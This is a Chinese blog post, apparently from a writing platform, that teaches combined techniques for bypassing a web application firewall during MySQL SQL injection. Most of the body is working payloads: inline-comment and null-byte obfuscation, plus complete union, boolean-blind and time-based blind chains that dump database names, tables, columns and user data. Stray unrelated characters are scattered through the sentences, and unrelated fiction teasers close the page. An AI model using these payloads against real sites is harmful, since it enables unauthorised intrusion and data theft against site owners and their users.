??組合繞過waf

我們可以活躍頭腦將and1=1換成-1=-1之類的或者使用or mod(8,7) in (1)意思是8/7余數(shù)等于1

組合繞過:

http://192.168.222.128/test/sql.php?id=1/*!union*//*%!aa*//*!select*/?1,2,3

先判斷注入點舶吗,把and為&&征冷,urlencode后為%26%26

http://192.168.0.102:8080/sql.php?id=1%20%26%26%20-1=-2

下面我們具體講解繞過方法:

1.利用()代替空格

2.利用mysql特性/*!*/執(zhí)行語句

3.利用/**/混淆代碼

我給出的注入語句是:

union/*%00*//*!50010select*/(database/**/()),(user/**/())%23

id=1/*|%23--%23|*/unioN/*|%23--%23|*/sElect/*|%23--%23|*/1,???? user(),(database/**/()),4,5

http://192.168.0.102:8080/sql.php?id=1union/*%00*//*!50010select*/1,user(),version(),4,5

這里要注意的幾點是:

1.mysql關(guān)鍵字中是不能插入/**/的择膝,即se/**/lect是會報錯的,但是函數(shù)名和括號之間是可以加上/**/的,像database/**/()這樣的代碼是可以執(zhí)行的

2./*!*/中間的代碼是可以執(zhí)行的检激,其中50010為mysql版本號肴捉,只要mysql大于這個版本就會執(zhí)行里面的代碼

3.數(shù)據(jù)或者函數(shù)周圍可以無限嵌套()

4.利用好%00?user())


完整過狗注入語句

判斷注入點:

?1'/**/%26%261%3d2%23

判斷列數(shù):

1'?order?by?2%23

關(guān)聯(lián)查詢爆出用戶和數(shù)據(jù)庫:?

1%27%20union/*%00*//*!50010select*/(database/**/()),(user/**/())%23

關(guān)聯(lián)查詢爆出數(shù)據(jù)表:?

%27%20union/*%00*//*!50010select*/((group_concat(table_name))),null/**/from/**/((information_schema.TABLES))/**/where/**/TABLE_SCHEMA%3d(database/**/())%23

關(guān)聯(lián)查詢爆出字段值:?

%27%20union/*%00*//*!50010select*/((group_concat(COLUMN_NAME))),null/**/from/**/((information_schema.columns))/**/where/**/TABLE_NAME%3d%27users%27%23

關(guān)聯(lián)查詢提取數(shù)據(jù):

?%27%20union/*%00*//*!50010select*/((group_concat(first_name))),null/**/from/**/((users))%23

盲注爆出數(shù)據(jù)庫:?

1' and substr(database/**/(),1,1)%3d'1'%23

盲注爆出數(shù)據(jù)表:?

1'/*%00*/and?substr((/*!50010select*/((group_concat(table_name)))/**/from/**/((information_schema.TABLES))/**/where/**/TABLE_SCHEMA%3d(database/**/())),1,1)%3d'1'%23

盲注爆出字段值:

?1'/*%00*/and substr((/*!50010select*/((group_concat(COLUMN_NAME)))/**/from/**/((information_schema.columns))/**/where/**/TABLE_NAME%3d%27users%27),1,1)%3d'1'%23

盲注提取數(shù)據(jù):?

1'/*%00*/and?substr((/*!50010select*/((group_concat(first_name)))/**/from/**/((users))),1,1)%3d'1'%23

基于時間的盲注爆出數(shù)據(jù)庫:

?1'/*%00*/and (select case when (substr(database/**/(),1,1) like 'd') then sleep/**/(3) else 0 end)%23

基于時間的盲注爆出數(shù)據(jù)表:?

1'/*%00*/and?(select?case?when?(substr((/*!50010select*/((group_concat(table_name)))/**/from/**/((information_schema.TABLES))/**/where/**/TABLE_SCHEMA%3d(database/**/())),1,1)?like?'d')?then?sleep/**/(3)?else?0?end)%23


基于時間的盲注爆出字段值:?

1'/*%00*/and (select case when (substr((/*!50010select*/((group_concat(COLUMN_NAME)))/**/from/**/((information_schema.columns))/**/where/**/TABLE_NAME%3d%27users%27),1,1) like 'd') then sleep/**/(3) else 0 end)%23

基于時間的盲注提取數(shù)據(jù): 1'/*%00*/and?(select?case?when?(substr((/*!50010select*/((group_concat(first_name)))/**/from/**/((users))),1,1)?like?'d')?then?sleep/**/(3)?else?0?end)%23

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市叔收,隨后出現(xiàn)的幾起案子齿穗,更是在濱河造成了極大的恐慌,老刑警劉巖饺律,帶你破解...
    沈念sama閱讀 206,214評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件窃页,死亡現(xiàn)場離奇詭異,居然都是意外死亡复濒,警方通過查閱死者的電腦和手機脖卖,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,307評論 2 382
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來巧颈,“玉大人畦木,你說我怎么就攤上這事≡曳海” “怎么了十籍?”我有些...
    開封第一講書人閱讀 152,543評論 0 341
  • 文/不壞的土叔 我叫張陵,是天一觀的道長唇礁。 經(jīng)常有香客問我勾栗,道長,這世上最難降的妖魔是什么盏筐? 我笑而不...
    開封第一講書人閱讀 55,221評論 1 279
  • 正文 為了忘掉前任围俘,我火速辦了婚禮,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘楷拳。我一直安慰自己绣夺,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 64,224評論 5 371
  • 文/花漫 我一把揭開白布欢揖。 她就那樣靜靜地躺著陶耍,像睡著了一般。 火紅的嫁衣襯著肌膚如雪她混。 梳的紋絲不亂的頭發(fā)上烈钞,一...
    開封第一講書人閱讀 49,007評論 1 284
  • 那天,我揣著相機與錄音坤按,去河邊找鬼毯欣。 笑死,一個胖子當(dāng)著我的面吹牛臭脓,可吹牛的內(nèi)容都是我干的酗钞。 我是一名探鬼主播,決...
    沈念sama閱讀 38,313評論 3 399
  • 文/蒼蘭香墨 我猛地睜開眼来累,長吁一口氣:“原來是場噩夢啊……” “哼砚作!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起嘹锁,我...
    開封第一講書人閱讀 36,956評論 0 259
  • 序言:老撾萬榮一對情侶失蹤葫录,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后领猾,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體米同,經(jīng)...
    沈念sama閱讀 43,441評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,925評論 2 323
  • 正文 我和宋清朗相戀三年摔竿,在試婚紗的時候發(fā)現(xiàn)自己被綠了面粮。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,018評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡拯坟,死狀恐怖但金,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情郁季,我是刑警寧澤冷溃,帶...
    沈念sama閱讀 33,685評論 4 322
  • 正文 年R本政府宣布,位于F島的核電站梦裂,受9級特大地震影響似枕,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜年柠,卻給世界環(huán)境...
    茶點故事閱讀 39,234評論 3 307
  • 文/蒙蒙 一凿歼、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦答憔、人聲如沸味赃。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,240評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽心俗。三九已至,卻和暖如春蓉驹,著一層夾襖步出監(jiān)牢的瞬間城榛,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,464評論 1 261
  • 我被黑心中介騙來泰國打工态兴, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留狠持,地道東北人。 一個月前我還...
    沈念sama閱讀 45,467評論 2 352
  • 正文 我出身青樓瞻润,卻偏偏與公主長得像喘垂,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子敢订,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 42,762評論 2 345

推薦閱讀更多精彩內(nèi)容